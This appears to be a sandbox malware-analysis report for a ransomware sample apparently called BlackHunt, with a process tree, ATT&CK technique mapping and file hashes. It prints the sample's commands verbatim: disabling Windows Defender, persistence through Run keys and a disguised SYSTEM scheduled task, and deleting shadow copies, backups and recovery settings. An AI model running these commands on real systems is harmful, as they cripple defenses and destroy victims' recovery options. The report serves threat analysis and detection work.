C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:1460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2372
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2312
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2432
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2148
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2292
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1532
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1728
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1856
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:436
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1788
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:896
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2132
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1160
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1860
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe" /F2⤵PID:1080
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8f70850f7f38d89cb48c1c156caf47196bbeb5ef2251daa952911e6165dfdc86.exe" /F3⤵
- Creates scheduled task(s)
PID:1584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2140
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1628
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1152
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2084
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2640
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1988
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2340
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1484
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2252
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2120
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2196
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:2612
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2332
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2836
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c49443a4d579c27d78787d61ac210571
SHA153b636ee31a17a9bc654612be3875709e1e22363
SHA256160a75a1d4702de44ccb275e09347d63b3e4c5e2e8c9dec6d0da07372d668b1a
SHA5129d5a377d866422b9f3b399e4afb76a6e49db448a31db5929a9cacb6c78a79a210445a15f37b6327a9fe7f90296e8b517d47b78363c6fc436884aadd790d31701
-
Filesize
12KB
MD5d73d53be023423e41c7a8a984d66f142
SHA1615b0f25123237394c9a563741e90f1d797f613e
SHA25612608c7f4666bc1b555736585bc0099a41fd2a0edb0d6217d6a655e552115991
SHA512593d04d8b8c2251691d4de7f274d91ac32253981b51e4002e5cb907209ffce8e845f53183d0c5a1821bb9dec39dbc9b7bca96d4de7d1c0d7a48331c8513e0ec5
-
Filesize
684B
MD5ac96b4003f323159efc48260c5466aea
SHA19bd7d27fea163fc95384e40f9cc40d594983ff17
SHA256eefbbec085f04589a72c84a23185f07d39e58fef6245523c8f2f2a28fd90e893
SHA5126d2f12c4f0965163966e1ee3091967646ea00c618260dadef72fbf557d51def5ae0bd2541165bf7af745362821b7c4cd93af0780421b509ebbe361c4ab54a636